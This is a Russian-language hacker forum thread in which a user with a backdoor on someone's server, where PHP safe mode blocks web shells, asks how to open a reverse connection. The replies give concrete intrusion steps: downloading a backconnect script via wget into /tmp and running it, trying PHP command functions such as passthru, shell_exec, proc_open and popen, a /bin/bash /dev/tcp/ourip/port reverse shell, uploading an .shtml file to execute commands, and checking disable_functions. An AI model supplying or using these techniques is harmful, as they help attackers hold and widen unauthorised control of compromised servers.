Просмотр полной версии : Backconnect через бекдор
На сервере не работает ни 1 шел, сейф мод включен
Вопрос:
Как через бекдор, сделать бекконект, не имея шела?
Пытался залить скрипт бэкконекта, и запустить командой
?cmd=system('perl dc.pl 127.0.0.1 8080');
Но увы не получилось, какие ещё есть способы?
На сервере не работает ни 1 шел, сейф мод включен
Вопрос:
Как через бекдор, сделать бекконект, не имея шела?
Пытался залить скрипт бэкконекта, и запустить командой
Но увы не получилось, какие ещё есть способы?
Залей через wget бэкконект в /tmp, переместись из текущего каталога в папку /tmp: cd /tmp, дай права на выполнение и запускай.
P.S. возможно не работает команда system, попробуй другие.
Вот я и спрашиваю какие другие есть, есть пример ?
passthru, system, exec, shell_exec
Cennarios
25.01.2013, 20:51
Покури вот в этом ключе:
/bin/bash /dev/tcp/ourip/port
Покури вот в этом ключе:
/bin/bash /dev/tcp/ourip/port
Скорее всего у него отключены функции для выполнения системных команд
Cennarios
25.01.2013, 22:27
А они вовсе не обязательны. Судя по всему есть возможность аплоадить файлы, но вследствие жестких ограничений на php, стандартные шелы не работают. Можно попробовать залить .shtml файл вида и в его контексте выполнить вышеуказанную схему. Правда там надо немного покопать гугл, есть нюансы при провешивании обратного соединения таким образом.
shtml шелл
еще команды, позволяющие выполнить команду - proc_open, popen
Cennarios
26.01.2013, 11:11
Пробовал, реакций нету...
Аналогично, 0
Тогда зиливай перловский скрипт на backconnect и через него додалбливай.
выведи значение disable_functions
vBulletin® v3.8.14, Copyright ©2000-2026, vBulletin Solutions, Inc. Перевод: zCarot